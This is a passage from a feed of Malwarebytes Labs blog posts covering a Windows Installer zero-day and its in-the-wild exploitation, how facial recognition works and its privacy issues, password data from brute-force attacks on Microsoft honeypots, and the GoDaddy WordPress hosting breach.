The researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the Trend Micro zero-day initiative, that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.

Apparently the main reason for his frustration was the reward level.

““Microsoft’s rewards have been very bad since April 2020; the community wouldn’t make these kinds of decisions if Microsoft took its rewards seriously.”

In the wild

Several security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quick attackers are able to weaponize publicly available exploit code.


The researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn’t seem confident that Microsoft will get it right this time.

“Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again.”

Microsoft says it is working on it. In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.

Malwarebytes detects and stops the exploit

Stay safe, everyone!

The post Windows Installer vulnerability becomes actively exploited zero-day appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What is facial recognition?

Wed, 11/24/2021 - 12:44

Facebook recently announced it would give up on its facial recognition system. Facebook, or Meta, was using software to automatically identify people in images posted to its social network. Since facial recognition has become an increasingly toxic concept in many circles and Facebook was having enough to deal with as it is, it shut the “feature“ down.  But that doesn’t mean that the technology no longer exists, or even that it isn’t used anymore.

Let’s establish first what we consider facial recognition to be.

By definition: A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.

In layman’s terms, facial recognition is technology to recognize a human face.

How does facial recognition work?

There are different systems and algorithms that can perform facial recognition, but at the basic level they all function the same—they use biometrics to map facial features from a photograph or video. The image is captured and reduced to a set of numbers that describes the face that needs to be identified. The software analyses the shape of the face by taking certain measurements that, all put together, provide a unique characteristic for the face. The shape of the face is reduced to a mathematical formula, and the numerical code of that formula is called a “faceprint.” Such a faceprint can be quickly compared to those stored in a database in order to identify the person.

You can compare this to a person leafing through an enormous book of portraits to find a suspect. Only much faster because now it’s a computer comparing sets of numbers.

How is facial recognition used?

The most well-known example of facial recognition is the one that can be used to unlock your phone or similar. In those cases, your face is compared to the ones that are authorized to use the phone.

Another convenient method of facial recognition can be found in some major airports around the world. An increasing number of travelers hold a biometric passport, which allows them to skip the long lines and walk through an automated ePassport control to reach their gate faster. This type of facial recognition not only reduces waiting times but also allows airports to improve security.

A lot less consensual is the fact that in some countries mobile and/or CCTV facial recognition is used to identify any person, by immediately comparing an image against one or more face recognition databases. In total, there are well over 100 countries today that are either using or have approved the use of facial recognition technology for surveillance purposes. This has brought up a lot of questions about our privacy.

What is bad about facial recognition?

As we can see from the above, facial recognition is not always bad. And it can be used to improve our personal and public security. It becomes a privacy issue when the consensus from the person in the database is missing. People, especially in large cities, have become used to being monitored a lot of the time that they spend outside. But when facial recognition adds the extra layer of tracking, or the possibility to do so, it becomes worrying.

China, for example, is already a place deeply wedded to multiple tracking/surveillance systems. According to estimates, there are well over 400 million CCTV cameras in the country, and they do not shy away from using facial recognition in public shaming to crack down on people that are jaywalking and other minor traffic offenders.

It’s because of the privacy implications that some tech giants have backed away from the technology, or halted their development. Many groups like American Civil Liberties Union (ACLU) and Electronic Frontier Foundation (EFF) have made objections against facial recognition technology as it is considered a breach of privacy to use biometrics to track and identify individuals without their consent. Many feel that there is already more than enough technology out there that keeps track of our behavior, preferences, and movement.

Can I use facial recognition to find someone?

For an individual to identify another individual would require access to a large database or an enormous amount of luck. As we explained, the faceprints are compared with those in a database. And that database has to contain a pretty large subset of the population you are looking in.

But there are other ways to identify an individual if he is nowhere to be found in the database. A picture can be compared to one that is openly posted on social media. Some organizations have built quite the databases just from harvesting pictures from social media. And you might be amazed about what a reverse image search could bring up. In essence, your chance of success finding a person based on a picture depends on how sophisticated your search algorithm is and how many pictures of your subject can be found on the Internet.

The other way around, if you do not want to be found, make sure that you don’t post your pictures everywhere, and when you do, make sure they are not publicly accessible. And stay out of the databases.

If you are interested in the subject of facial recognition, you may also want to listen to S1Ep6 of the Malwarebytes podcast Lock and Code where we talk with Chris Boyd about “Recognizing facial recognition’s flaws

The post What is facial recognition? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Password usage analysis of brute force attacks on honeypot servers

Wed, 11/24/2021 - 11:25

As Microsoft’s Head of Deception, Ross Bevington is responsible for setting up and maintaining honeypots that look like legitimate systems and servers.

Honeypot systems are designed to pose as an attractive target for attackers. Sometimes they are left vulnerable to create a controllable and safe environment to study ongoing attacks. This provides researchers with data on how attackers operate and enables them to study different threats.

In Bevington’s words:

“I develop and lecture on these technologies with emphasis on the human behind the keyboard and how to integrate Deception into general security posture.”

Now, Bevington has released information gathered from Microsoft honeypots of over 25 million brute force attacks against SSH.


Secure Shell (SSH) is a protocol optimized for Linux server access, but it can be used across any operating system’s server. Remote Desktop Protocol (RDP) is almost exclusively used for accessing Windows virtual machines and physical Windows servers. Based on data provided by Bevington, which were taken from more than 14 billion brute-force attack attempts against Microsoft’s network of honeypot servers until September this year, attacks on Remote Desktop Protocol (RDP) servers have seen a rise of 325%.

RDP is one of the most popular targets because it is a front door to your computer that can be opened from the Internet by anyone with the right password. And because of the ongoing pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened.

The data

What the research data analysis looked at were the credentials that were attempted during more than 25 million brute force attacks against the Microsoft honeypot systems, which roughly represents a period of 30 days.

Some highlights of these results:

  • 77% of the passwords were between 1 and 7 characters long
  • Only 6% of the passwords were longer than 10 characters
  • 39% of the passwords contained at least one number
  • None of the attempted passwords contained a space

The data above can help you determine whether a password is more secure than another. But, there are some caveats. Passwords need to be long and complex because it’s their length, complexity and uniqueness that determines how difficult they are to crack.

However, you can have the longest password in the world, but if it has been leaked in a breach there is a chance that an attacker will add it to their dictionary. This is the reason we tell you not to re-use your passwords. It’s inconvenient to lose one in a breach, but if that means having to change your password on multiple sites and services, it’s a major inconvenience.

In an older study by Microsoft, it was determined that users should spend less effort on password management issues for don’t-care and lower consequence accounts, allowing more effort on higher consequence accounts. Unless you are using a password manager doing the work for you, of course. Your efforts to come up with a strong password are wasted at sites that store passwords in plaintext or reversibly encrypted.

Sites that require minimum length and/or use other complexity standards have always been a major annoyance. Not only because every site uses a different standard, some of which have been made obsolete, they also encourage users to come up with simple passwords that just barely meet the standard. Am I right, MyDogsName1 and P@$$w0rd?

One of the recommendations of the earlier Microsoft study was that organizations should invest their own resources in securing systems rather than simply offloading the cost to end users in the form of advice, demands or enforcement policies that are often pointless.

The fact that none of the attempts contained a space looks favorable for insights that recommend using three random words separated by spaces. Easy to remember, type in (especially on smaller devices) and harder to guess.

Passwordless future

Not too long ago, Microsoft announced that as of September 15, 2021 you can completely remove the password from your Microsoft account and use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email to sign in to Microsoft apps and services. We talked that over with a world expert on passwords, Per Thorsheim, and while we will welcome the passwordless future, there are some concerns when it comes to account recovery and what may happen when people lose access to their choice of authenticator.

How to protect your organization from brute force attacks

The ground rules of protecting against remote online attacks are basically:

  • Limit the number of open ports
  • Restrict the access to those that need it
  • Enhance security of the port and the protocol

There are applications that can help you accomplish these basic tasks if you feel the built-in tools are too hard to configure.

Restricting the access is the point of this post. Telling us that a password alone is not always enough. And when you rely on passwords make sure to choose them wisely.

Stay safe, everyone!

The post Password usage analysis of brute force attacks on honeypot servers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Millions of GoDaddy customer data compromised in breach

Tue, 11/23/2021 - 17:41

Domain name registrar giant and hosting provider GoDaddy yesterday disclosed to the Securities and Exchange Commission (SEC) that it had suffered a security breach.

In the notice, it explained it had been compromised via an “unauthorized third-party access to our Managed WordPress hosting environment.” The unknown culprit behind the attack stole up to 1.2 million active and inactive customer data, including email addresses, original WordPress admin passwords, Secure File Transfer Protocol (sFTP) and database credentials, and SSL private keys.

The company said it has taken measures to secure accounts and the environment, such as resetting passwords and blocking the unauthorised third-party from accessing its system, and said it will be issuing new certificates for specific customers.

GoDaddy first detected suspicious activity in its Managed WordPress hosting environment on Wednesday last week. According to initial investigations, the intruder used a compromised password to access legacy code in GoDaddy’s environment to steal data. Investigations are ongoing.

“We are sincerely sorry for this incident and the concern it causes for our customers,” wrote Demetrius Comes, GoDaddy’s Chief Information Security Officer (CISO), “We, GoDaddy leadership and employees, take our responsibility to protect our customers’ data very seriously and never want to let them down. We will learn from this incident and are already taking steps to strengthen our provisioning system with additional layers of protection.”

According to researchers from Defiant Inc, developers of Wordfence—a plugin for securing WordPress sites—GoDaddy has been handling sFTP in a way that doesn’t follow standard practices: “It appears that GoDaddy was storing sFTP credentials either as plaintext, or in a format that could be reversed into plaintext. They did this rather than using a salted hash, or a public key, both of which are considered industry best practices for sFTP. This allowed an attacker direct access to password credentials without the need to crack them.”

GoDaddy customer? Here’s what to do

If you use GoDaddy’s hosting service and are unsure if your account might be one of those affected, do not leave this to chance. Act now before someone takes the opportunity to take over your account.

GoDaddy has provided a good list of steps to take to lock down an account that might be potentially compromised:

Stay safe!

The post Millions of GoDaddy customer data compromised in breach appeared first on Malwarebytes Labs.

Categories: Techie Feeds